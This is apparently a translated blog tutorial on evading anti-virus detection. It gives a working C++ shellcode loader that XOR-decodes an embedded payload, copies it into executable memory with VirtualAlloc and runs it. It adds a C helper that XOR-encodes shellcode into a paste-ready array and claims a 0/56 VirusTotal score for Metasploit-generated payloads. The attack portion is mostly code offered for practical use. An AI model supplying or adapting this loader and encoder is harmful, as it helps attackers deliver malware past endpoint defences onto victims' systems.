Bypassing Anti-Virus Software with Ten Lines of Code: A Walkthrough

Source: Internet
Author: User


I originally intended to write a long post covering bypass techniques for a range of anti-virus products, but when I started on the first chapter of the tutorial and uploaded the sample to VirusTotal, I was shocked: the sample got a 0/56 detection rate. So I scrapped the long article and decided to document this fast and surprisingly simple method instead.

I expect most readers will agree that the basic methods for bypassing most anti-virus software are nothing special. Still, I occasionally see people relying solely on tools to generate their binaries, and those binaries are easily identified by anti-virus software through their fingerprints. This article is for them.

Before getting to this small piece of C++ code, I want to mention a very good tool for building AV-evading payloads: Veil-Evasion (part of the Veil-Framework). It is an excellent tool (thanks to @harmj0y and friends for creating this project), and in almost every case it has not let me down. I would, however, take issue with anyone who keeps generating binaries with it and uploading them to VirusTotal for testing; if you are not doing that, so much the better.

Either way, this raises a question: if tools like Veil-Evasion are that good, why should you care about how to embed shellcode in a binary yourself? There are several reasons:

• The maintainers are busy, and tools fall out of date.
• Binaries generated by a tool share a similar fingerprint: not the payload itself, but the structure of the binary the tool compiles has a recognisable signature.
• As a penetration tester, you should know how to do this yourself.

Before you look at the code, note that it targets Windows; that is obvious from the windows.h include.

#include <windows.h>
#include <cstring>

int main(int argc, char **argv) {
    // Paste your shellcode here, already XORed byte-by-byte with 'x'
    // (for example 0x4C, 0x4F, 0x4C).
    char b[] = { /* XORed shellcode goes here */ };
    char c[sizeof b];
    // Undo the XOR at run time, so the decoded bytes only ever exist in memory.
    for (int i = 0; i < sizeof b; i++) {
        c[i] = b[i] ^ 'x';
    }
    // Allocate RWX memory, copy the decoded shellcode in, and jump to it.
    void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, c, sizeof c);
    ((void (*)())exec)();
}

The code above declares a character array to hold your shellcode. The key point is that the shellcode is stored XORed with the lower-case letter 'x'; at run time the program XORs each byte back with 'x' into a second array, allocates some memory, copies the decoded array into it, and executes it. Note that you must XOR your shellcode with the chosen key ('x' in this example) beforehand, then paste the result into the code above and compile it. Only the bytes on disk change; the decoded payload still lands in a single VirtualAlloc region mapped PAGE_EXECUTE_READWRITE, so what this defeats is static signature matching on the file, not inspection of the process at run time.
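The article leaves the encoding step to the reader. The following C program is an added example, not part of the original post or the Veil project: it XORs a payload with the single-byte key, prints the result as a C initializer list ready to paste into the char b[] array above, and verifies that decoding with the same key restores the original bytes. The three-byte payload 0x4C, 0x4F, 0x4C is a constructed stand-in for real shellcode; the function names xor_bytes and emit_c_array are this example's own.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* XOR every byte of `in` with a single-byte key and write it to `out`.
 * XOR is its own inverse, so the same call encodes and decodes.
 * Returns the number of bytes processed. */
size_t xor_bytes(const unsigned char *in, unsigned char *out, size_t len,
                 unsigned char key) {
    for (size_t i = 0; i < len; i++) {
        out[i] = in[i] ^ key;
    }
    return len;
}

/* Render `len` bytes as a C initializer list, e.g. "0x34, 0x37, 0x34",
 * into `dst` (capacity `cap`). Returns the number of characters written,
 * or -1 if `dst` is too small to hold the whole listing. */
int emit_c_array(const unsigned char *buf, size_t len, char *dst, size_t cap) {
    size_t used = 0;
    for (size_t i = 0; i < len; i++) {
        int n = snprintf(dst + used, cap - used, "%s0x%02X",
                         i ? ", " : "", buf[i]);
        if (n < 0 || (size_t)n >= cap - used) {
            return -1;  /* truncated: caller's buffer is too small */
        }
        used += (size_t)n;
    }
    return (int)used;
}

/* Constructed stand-in for a shellcode blob (the bytes "LOL" the article
 * uses as its illustration); replace with real shellcode in practice. */
static const unsigned char SAMPLE_PAYLOAD[] = { 0x4C, 0x4F, 0x4C };

int main(void) {
    unsigned char encoded[sizeof SAMPLE_PAYLOAD];
    unsigned char decoded[sizeof SAMPLE_PAYLOAD];
    char listing[64];

    /* Encode with the same key the loader uses ('x'). */
    xor_bytes(SAMPLE_PAYLOAD, encoded, sizeof SAMPLE_PAYLOAD, 'x');
    if (emit_c_array(encoded, sizeof encoded, listing, sizeof listing) < 0) {
        return 1;
    }
    printf("char b[] = { %s };\n", listing);

    /* Round-trip check: decoding with the same key must give the original. */
    xor_bytes(encoded, decoded, sizeof encoded, 'x');
    return memcmp(decoded, SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD) == 0 ? 0 : 1;
}
```

For the constructed payload this prints `char b[] = { 0x34, 0x37, 0x34 };`, which is exactly what goes into the loader's array. Any byte of the payload equal to the key (0x78, 'x') encodes to 0x00, which is harmless here because the loader copies by sizeof rather than treating the array as a C string.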

Then you may ask, "That's all?". I understand, because I thought the same at the time. After writing the first chapter and uploading the sample to VirusTotal, I got a 0/56 detection rate. I want to emphasise that this is an incredibly simple and basic technique, but its success rate is surprisingly high.

The SHA256 of your binary will differ from my sample's. The shellcode in my sample was generated with the Metasploit Framework.
